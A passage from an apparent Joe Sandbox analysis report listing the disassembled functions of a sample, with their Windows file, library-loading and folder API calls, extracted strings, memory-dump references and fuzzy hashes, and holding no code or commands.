                                                                                                                                                                          • Part of subcall function 00CD6E80: FreeLibrary.KERNEL32(00000000), ref: 00CD6EEA
                                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104,1FC3D414,?,?), ref: 00CE2450
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressEnvironmentFreeLoadProcVariable
                                                                                                                                                                        • String ID: AI_BOOTSTRAPPERLANGS$APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFilesFolder$Shell32.dll$Shlwapi.dll
                                                                                                                                                                        • API String ID: 788177547-1020860216
                                                                                                                                                                        • Opcode ID: 5a7d761865c31c6f35ff104dac9fb0336725c75c41a55c67d97300f8826b70cd
                                                                                                                                                                        • Instruction ID: f8a7b25e129e182601ecc076a66ff0a0430cd4155606a97f621626339afe6648
                                                                                                                                                                        • Opcode Fuzzy Hash: 5a7d761865c31c6f35ff104dac9fb0336725c75c41a55c67d97300f8826b70cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C9125716002559FDB24DF26DC45BBAB3ADFF60310F1445AAE816D72A1EB31DE44CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD0330 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 346fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1FC3D414), ref: 00CD03B9
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 00CD042B
                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 00CD06CC
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00CD072A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Read$CloseCreateHandle
                                                                                                                                                                        • String ID: <3
                                                                                                                                                                        • API String ID: 1724936099-878583566
                                                                                                                                                                        • Opcode ID: 089085d62a4c22d7a4398d36d2a90b2b23b5082951571fae5541bfc4d3856828
                                                                                                                                                                        • Instruction ID: 790cfb0950dc5084d6b86c17e0f1d0646e50387508829ab82a2217d02403e750
                                                                                                                                                                        • Opcode Fuzzy Hash: 089085d62a4c22d7a4398d36d2a90b2b23b5082951571fae5541bfc4d3856828
                                                                                                                                                                        • Instruction Fuzzy Hash: 44D18E71D00308DBDB20CFA8C949BAEBBB5BF45304F30825AE955AB381D774AA45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CB4260 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 248fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000), ref: 00CB434F
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00CB4377
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 00CB43B9
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00CB440E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFileHandle$CreateWrite
                                                                                                                                                                        • String ID: .bat$<3$EXE$open
                                                                                                                                                                        • API String ID: 3602564925-2165540456
                                                                                                                                                                        • Opcode ID: 9aa38f35704e80deeebc7bebe3315c3068f972733e8771c987b7981077bd63f3
                                                                                                                                                                        • Instruction ID: 519afe2942d7a2f2c447af91f99189691e63c881de33c92bfaf92586149a1066
                                                                                                                                                                        • Opcode Fuzzy Hash: 9aa38f35704e80deeebc7bebe3315c3068f972733e8771c987b7981077bd63f3
                                                                                                                                                                        • Instruction Fuzzy Hash: DCA17970901648EFEB14CFA9CD48B9DBBF4EF45314F288299E455AB292DB709E48CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCD0A0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 150fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BCD18F
                                                                                                                                                                          • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
                                                                                                                                                                          • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
                                                                                                                                                                          • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,1FC3D416), ref: 00BCD1E3
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BCD240
                                                                                                                                                                          • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
                                                                                                                                                                          • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00BCD2A7
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,742BCF00), ref: 00BCD2CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
                                                                                                                                                                        • String ID: <3$aix$html
                                                                                                                                                                        • API String ID: 2030708724-1345216711
                                                                                                                                                                        • Opcode ID: 6749f00be51b9d7a646afeb60b8a715009a937040db4c818c5c370ecd6aa1281
                                                                                                                                                                        • Instruction ID: 95050825d9479c7df295b6bfdb2c4925ef6f56d494c4456fab1c597a804f4d8d
                                                                                                                                                                        • Opcode Fuzzy Hash: 6749f00be51b9d7a646afeb60b8a715009a937040db4c818c5c370ecd6aa1281
                                                                                                                                                                        • Instruction Fuzzy Hash: A16179B0900248DFEB10DFA5D949B9EBBF4EB44708F14455EE111BB390DBB56A48CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CF5700 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 148libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 00CF573C
                                                                                                                                                                        • GetUserDefaultLangID.KERNEL32 ref: 00CF5749
                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00CF575B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 00CF576F
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00CF5784
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressDefaultLangProc$LibraryLoadSystemUser
                                                                                                                                                                        • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                                        • API String ID: 667524283-3528650308
                                                                                                                                                                        • Opcode ID: 0f97223814fb23572bef22f334b1b58a8b8a74ab926daec4f3d7c8e8285844cf
                                                                                                                                                                        • Instruction ID: 49236825c8a6e8c54cde782a077c2397f878ed21d5a07a57f0196300dfedddd7
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f97223814fb23572bef22f334b1b58a8b8a74ab926daec4f3d7c8e8285844cf
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B419E70A44745DFC784EF25E85067A77E1AFA8351F91182EFB85D3280EB34C945CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB96A0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 230COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BB9785
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BB97D0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID: </a>$<a href="$<a>$h$h
                                                                                                                                                                        • API String ID: 1385522511-3989131236
                                                                                                                                                                        • Opcode ID: 96d821116c134fc74eb92fcc606815a3cea989072299b741add978081e71b215
                                                                                                                                                                        • Instruction ID: cf226fe11a1a3abdc786118aa1701468eaf2e6f279720d969b197d6ae1283885
                                                                                                                                                                        • Opcode Fuzzy Hash: 96d821116c134fc74eb92fcc606815a3cea989072299b741add978081e71b215
                                                                                                                                                                        • Instruction Fuzzy Hash: 30919C70A00704EFDB04EFA8D845BADB7F5FF48314F10429AE525AB2D1EBB0A945CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC0EC0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 221libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BC0F61
                                                                                                                                                                          • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
                                                                                                                                                                          • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
                                                                                                                                                                          • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W), ref: 00BC0FAA
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00BC0FB1
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BC0FC5
                                                                                                                                                                          • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
                                                                                                                                                                          • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,1FC3D414), ref: 00BC0FF2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionHandleModulePathProcTempVariableWake
                                                                                                                                                                        • String ID: GetTempPath2W$Kernel32.dll
                                                                                                                                                                        • API String ID: 3676318360-1983778095
                                                                                                                                                                        • Opcode ID: f6ed17c89e9c0abb3f308bc7b2450095ac397820df6dbba85a4acfc9d15e9315
                                                                                                                                                                        • Instruction ID: c61c22b59b0d64512b9b91716a78b18e15ebf347ce1ca56dfc20a54a22a43884
                                                                                                                                                                        • Opcode Fuzzy Hash: f6ed17c89e9c0abb3f308bc7b2450095ac397820df6dbba85a4acfc9d15e9315
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C81A5B1D00208EFDB20DF98DC85BDDB7F4EB18710F5046AEE515A7281DB746A48CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC9050 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetLastError.KERNEL32(0000000E,1FC3D414,?,?,00000000,?), ref: 00BC908E
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BC90CF
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E9E7BC), ref: 00BC90EF
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E9E7BC), ref: 00BC9113
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,00000000,00000000,00E9E7BC,?,80000000,00000000,80000000,00000000,00000000,00000000), ref: 00BC916E
                                                                                                                                                                          • Part of subcall function 00D7FA13: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00CF5F3E,?,?,?,?,?,?), ref: 00D7FA18
                                                                                                                                                                          • Part of subcall function 00D7FA13: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D7FA1F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
                                                                                                                                                                        • String ID: AXWIN UI Window$K
                                                                                                                                                                        • API String ID: 213679520-2178310310
                                                                                                                                                                        • Opcode ID: d14d4d3fb2f72d5c5de58e70f9a98c03203f424ff6aa3bf72ef8fd34b02ccb16
                                                                                                                                                                        • Instruction ID: d8ff855bc92f0486dbf1a054344dc75d79381c12ab1ccb051a231618af8ede57
                                                                                                                                                                        • Opcode Fuzzy Hash: d14d4d3fb2f72d5c5de58e70f9a98c03203f424ff6aa3bf72ef8fd34b02ccb16
                                                                                                                                                                        • Instruction Fuzzy Hash: CF51A271600305AFEB10CF59DD09F9ABBF4FB88B14F14816EF954A7280D771A818CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB26E0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00E9948C,00000000,1FC3D414,00000000,00DE4033,000000FF,?,1FC3D414), ref: 00BB2853
                                                                                                                                                                        • GetLastError.KERNEL32(?,1FC3D414), ref: 00BB285D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                                                                                        • String ID: <Y$VolumeCostDifference$VolumeCostRequired$VolumeCostVolume$dY
                                                                                                                                                                        • API String ID: 439134102-2465320836
                                                                                                                                                                        • Opcode ID: e9c0e50947c95f25d69be2a1b46571b94308ca759cdf0cb762d7e57f214945e1
                                                                                                                                                                        • Instruction ID: c04457e1057e9ca651492e9cdf1ab9ea796485014162047599b93634b07d074b
                                                                                                                                                                        • Opcode Fuzzy Hash: e9c0e50947c95f25d69be2a1b46571b94308ca759cdf0cb762d7e57f214945e1
                                                                                                                                                                        • Instruction Fuzzy Hash: C751E1B1900208DFDB11CF6AED457EEBBF4EB48714F00026AD425B7291E7B559098BA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D135B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,00E994D0), ref: 00D135C0
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 00D135D3
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00D135E3
                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00D1366C
                                                                                                                                                                        • SHGetMalloc.SHELL32(?), ref: 00D136AE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
                                                                                                                                                                        • String ID: SHGetSpecialFolderPathW$Shell32.dll
                                                                                                                                                                        • API String ID: 2352187698-2988203397
                                                                                                                                                                        • Opcode ID: c85c7c21a36747508e680bbf18865c53172573732406433ff52ab141590d330e
                                                                                                                                                                        • Instruction ID: ebdad87b11af7819e5e5f9eacf97eb18e65847c4cf2d30fc3f943ad394660c9e
                                                                                                                                                                        • Opcode Fuzzy Hash: c85c7c21a36747508e680bbf18865c53172573732406433ff52ab141590d330e
                                                                                                                                                                        • Instruction Fuzzy Hash: 6731B371600701BBDB249F24EC05BA7B7F5AF94711F48842DE88997290EF7199C98BA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD8440 Relevance: 12.2, APIs: 8, Instructions: 155COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00CD8451
                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00CD8529
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DialogLongWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 900524653-0
                                                                                                                                                                        • Opcode ID: 6fff1646b263a4fd1cda05cbb2d24b85273ee87272819e04dea3bae724cdec71
                                                                                                                                                                        • Instruction ID: 3aa7cc916a9bc3ee29619d3518b89301dea48fc022591c8badbf71ff69d9d193
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fff1646b263a4fd1cda05cbb2d24b85273ee87272819e04dea3bae724cdec71
                                                                                                                                                                        • Instruction Fuzzy Hash: F741F3322182142BD634AE3DAC09B7A3B9CDB85331F00072BFEA5D23D1DA61DD19D6A1
